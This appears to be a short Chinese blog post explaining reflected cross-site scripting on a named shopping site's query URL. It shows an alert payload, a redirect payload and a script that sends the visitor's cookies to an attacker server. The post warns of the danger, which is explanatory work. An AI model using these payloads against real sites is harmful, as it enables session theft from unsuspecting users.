跨站攻擊的道理,請百度,下面演示一下,有個認識
比如
有個商品查詢 http://www.zgyafu.com/goods/goodsList?type=5
後面加一段javascript 代碼 >'"><script>alert(28396)</script>
url 變成
http://www.zgyafu.com/goods/goodsList?type=5>'"><script>alert(28396)</script>
出現如圖,也許有人說,不就是彈出個腳本嗎,那就錯了,如果javascript 換成攻擊腳本,就不是簡單彈出了,如果
http://www.zgyafu.com/goods/goodsList?type=5>'"/><script>window.open("http://www.baidu.com")</script> 那麼看出來沒?會跳轉到 www.baidu.com 。
有人還以爲,不就是跳到百度嗎?
那麼如果換成 <script>window.open("http://172.16.2.192/xss_hacker.php?cookie="+document.cookie);</script> 跳轉到一個惡意地址,把你的cookie 傳到另外的服務器,那麼你的信息有沒有泄露? 通過這些簡單的演示,就該知道 跨站攻擊多麼危險。比如如果銀行跨站,然後引導到另外頁面,是不是大家的卡號密碼就會被獲取?
亞夫在線 亞夫在線 亞夫在線 亞夫在線 亞夫在線 亞夫在線 亞夫在線